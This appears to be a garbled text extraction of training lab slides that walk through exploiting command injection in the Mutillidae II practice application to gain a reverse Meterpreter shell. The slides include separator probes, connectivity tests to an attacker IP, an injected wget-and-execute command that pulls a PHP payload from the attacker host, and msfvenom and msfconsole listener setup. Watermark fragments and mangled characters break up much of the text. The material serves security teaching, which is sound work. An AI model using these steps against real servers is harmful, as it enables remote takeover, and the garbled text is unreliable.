
or f d

D T SC

ll A -

ts h g i

ed v r e es

t

gh Command  Injec,on   i r py o C ) c (

LAB  

61  

Command  Injec&on     •  Reverse  Meterpreter  

D T SC

ll A -

R

ts h g i

or f d •  Reference:  demo-­‐command-­‐injec,on-­‐via-­‐meterpreter-­‐php-­‐shell-­‐upload.txt   e r pa e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

62  

ts Command  injec&on  to  gain   h g i R l reverse  Meterpreter  shell   Al D T   SC r fo •  The  DNS  lookup  page  in   d re a p e Mu&llidae  II  contains  a   r P command  injec&on  vulnerability   LC L IS E •  Ubuntu   nd a •  h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-­‐lookup.php   m e r Je •  Samurai  WTF   t gh i r py •  h`p://mu,llidae/index.php? o C ) c page=dns-­‐lookup.php   (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

63  

Command  injec&on  to  gain  reverse   Meterpreter  shell     •  Locate  the  command  injec&on   vulnerability  using  command   separators  and  universal  binaries   •  •  •  • 

&  ls   |  ls   ;  ls   Others   op C (c)

nd a n

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

64  

Command  injec&on  to  gain  reverse  Meterpreter  shell    

ll A -

R

ts h g i

R

ed v r e es

D T SC •  Send  commands  tes&ng  outbound  connec&vity  from  voulnerable   server   r f d e back  to  a>acker  controlled  host   r pa e r •  Set  up  listener  on  a`acker  controlled  host   - P C L L •  A`empt  to  have  web  applica,on  server   ISreach  out  to  a`acker  host  over  various   E protocols  and  ports   nd a n •  ICMP  à  ping  -­‐c  1  10.0.0.164  rui D y •  UDP  à    tracepath  -­‐c  re 1  m 10.0.0.164   e tJ •  TCP  à    telnet   1 0.0.0.164   1234   h g i r ppyrotocols  likely  to  be  allowed   o •  Test  ports  a) nd   C c ( •  DNS,  web,  proxy,  etc.  

 

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

65  

R

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l Al   D T •  Set  up  tcpdump  on  local  host  filtering  for  incoming  packets   SC des&ned  for   r fo d a>acker  IP   re a

•  tcpdump  -­‐i  eth0  -­‐vv  -­‐X  dst    

 

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

p e r -P

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

66  

Command  injec&on  to  gain  reverse  Meterpreter  shell     •  A`empt  to  have  web  applica,on  send  packet  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f d •  www.google.com;  tracepath  -­‐c  1  10.224.35.168  (UDP)   e r pa e r •  www.google.com  &  telnet  10.224.35.168  1234   P(TCP)   LC L IS E nd   a A>acking  host  receives  packet   uin r D confirming  connec&vity   y m re e tJ h rig y op C (c)

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

67  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T •  Assuming  vulnerable  web  server  can  connect  back  to  ar>acker   host,  it  may   SC fo be  possible  to  force  web  server  to  download  payload   d re

a •  A  web  server  can  be  set  up  on  a`acker  host   Prep C •  A  command  injec,on  can  cause  web  server   L can  download  and  execute  content   L IS E nd a wget  h>p://acker  IP>/php-­‐meter-­‐script.txt   -­‐O  /tmp/php-­‐meter-­‐script.php   uin r D y php  -­‐f  /tmp/php-­‐meter-­‐script.php   m e er J t h Download  and   g i r py save  file  from   o Execute   fi le   w ith   C a>acker  host   (c) PHP  interpreter  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

68  

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T •  Search  available  payloads  for  those  that  offer  PHP  Meterpreter   SC r fo d   re a p e r msfvenom  -­‐-­‐list  payloads  |  grep  php/meter   - P nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

69  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T •  Use  msfvenom  to  generate  Meterpreter  PHP  payload   r SC fo d   re a p e r Pphp/meterpreter/ msfvenom  -­‐-­‐arch  php  -­‐-­‐plalorm  PHP  -­‐-­‐payload   C LP>   reverse_tcp  -­‐-­‐format  raw  lhost=
acker   I lport=acker  port>  >  /var/ L S I E www/html/commented-­‐php-­‐meter-­‐script.txt   d n n rui

D y m

t

(c)

py o C

h rig

re e J

a

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

70  

R

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T C •  msfvenom  puts  a  comment  symbol  at  the  front  of  the  M PHP   Seterpreter   r fo payload   d re a

•  Remove  the  comment  symbol  

L L EIS

C

p e r -P

sed  's/\/\*//'  /var/www/html/commented-­‐php-­‐meter-­‐script.txt   >  /var/ nd a n www/html/php-­‐meter-­‐script.txt   rui D y m

t

(c)

py o C

h rig

re e J

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

71  

Command  injec&on  to  gain  reverse  Meterpreter  shell     •  Start  Apache  web  server  running  on  a>acking  host  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f d the  vulnerable  web   •  The  web  server  will  serve  the  Meterpreter  PHP  shell  w hen   e r pa e server  requests  the  file   r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

72  

Command  injec&on  to  gain  reverse  Meterpreter   shell     •  Start  a  listener  on  the  a>acking  host  for   Meterpreter  to  connect    

LC msfconsole   L IS E msf  >  use  mul&/handler   nd a uipnhp/ msf    exploit(handler)  >  set  payload   r D meterpreter/reverse_tcp   emy er J msf    exploit(handler)  g>h  st et  lhost  
acker  IP>   ri y p msf    exploit(handler)   >  set  lport  acker  port>   o C (c) msf    exploit(handler)   >  exploit  

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

73  

ts Command  injec&on  to  gain  reverse   h g i R l Meterpreter  shell   Al D T   SC r fo •  Inject  command  to  cause  web  server  to  pull   d re a p e file  from  a>acking  host  and  execute   r P Meterpreter  script   LC nd a n

L S I E

&  ;wget  h>p://10.224.35.168/php-­‐meter-­‐ ui r D y script.txt  -­‐O  /tmp/php-­‐meter-­‐script.php;php   -­‐ m e r Je f  /tmp/php-­‐meter-­‐script.php   t h

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

g

(c)

yri p Co

74  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T •  If  the  user  under  which  the  web  server  is  running  has  prrivileges,   the  web   SC fo server  will  connect  back  to  a>acking  host   d re a

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

p e r -P

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

75  

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

REFERENCES  

C

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

76  

R

ts •  [1]  OWASP  Top  10  2013   h g i R l h`ps://www.owasp.org/index.php/Top_10_2013-­‐Top_10   Al D T •  [2]  OWASP  Louisville  Chapter,  h`ps://www.owasp.org/index.php/Louisville   SC r fo •  [3]  OWASP  Zed  A`ack  Proxy  Project,  OWASP,   d re a p e h`ps://www.owasp.org/index.php/OWASP_Zed_A`ack_Proxy_Project     r P C •  [5]  Burp-­‐Suite  Pro,  PortSwigger  Ltd  h`p://portswigger.net/   LL

op C (c)

t h g yri

J

m e r e

y

uin r D

IS E d an

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

References  

77  

R

ed v r e es

ts •  [6]  Command-­‐injec,on-­‐to-­‐shell   h g i R l h`p://www.aldeid.com/wiki/Command-­‐injec,on-­‐to-­‐shell   Al Dand  Disable   T •  [7]  Mu,llidae:  Command  Injec,on  to  Dump  Files,  Start  Services,   SC r fo   Firewall  h`p://www.youtube.com/watch?v=1bXTq_qaa_U   d re a [8]  Mu,llidae:  How  to  Locate  the  Easter  egg  File  ursing   p Command  Injec,on   e P h`p://www.youtube.com/watch?v=VWZYyH0VewQ     C L LAccess  via  Command  Injec,on   S [9]  Mu,llidae:  Gaining  Administra,ve  Shell   I E d h`p://www.youtube.com/watch?v=GRuRK-­‐bejgM     an n i ruInjec,on  to  Gain  Remote  Desktop   [10]  Mu,llidae:  Using  Command   D y m e h`p://www.youtube.com/watch?v=if17nCdQfMg     er op C (c)

t h g yri

J

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

References  

78  

Recommend Documents
Web Application Security ... which a user is sent to a malicious web page by an a.acker ..... PHP can create an HTTP header using the "header()" func on.

Click here! ..... EMAIL]&PayeeIsEmailToOrange=true&PayeeOrangeAccount=[PAYEE ACCOUNT NUM]&.

Web applications by definition allow users access to a central resource — the ... Thus secure web application development is an errorprone process and ...

SELECT password,tel,fax,email FROM personal. WHERE surname='Sharp';. When executed on some SQL databases, this will result in. Sharp's password being ...

velopment technologies (e.g., CGI, PHP, ASP), web browser and client-side technologies (e.g., JavaScript, Flash). Web application built and hosted upon such a ...

Oct 10, 2016 - Mr. Gomez attained a Bachelor of Arts degree in Economics and a ...... the Federal Certification of the Child Support Enforcement (CSE) system.

Application Security ... The bytecode graph is sent to the cloud for analysis to help determine which ... relevant encrypted code from the cloud to your device.

LEARNING ON THE FLY. Most developers are not trained in the practices of ... Recognized as a Gartner Magic. Quadrant Leader since 2010, Veracode secures ...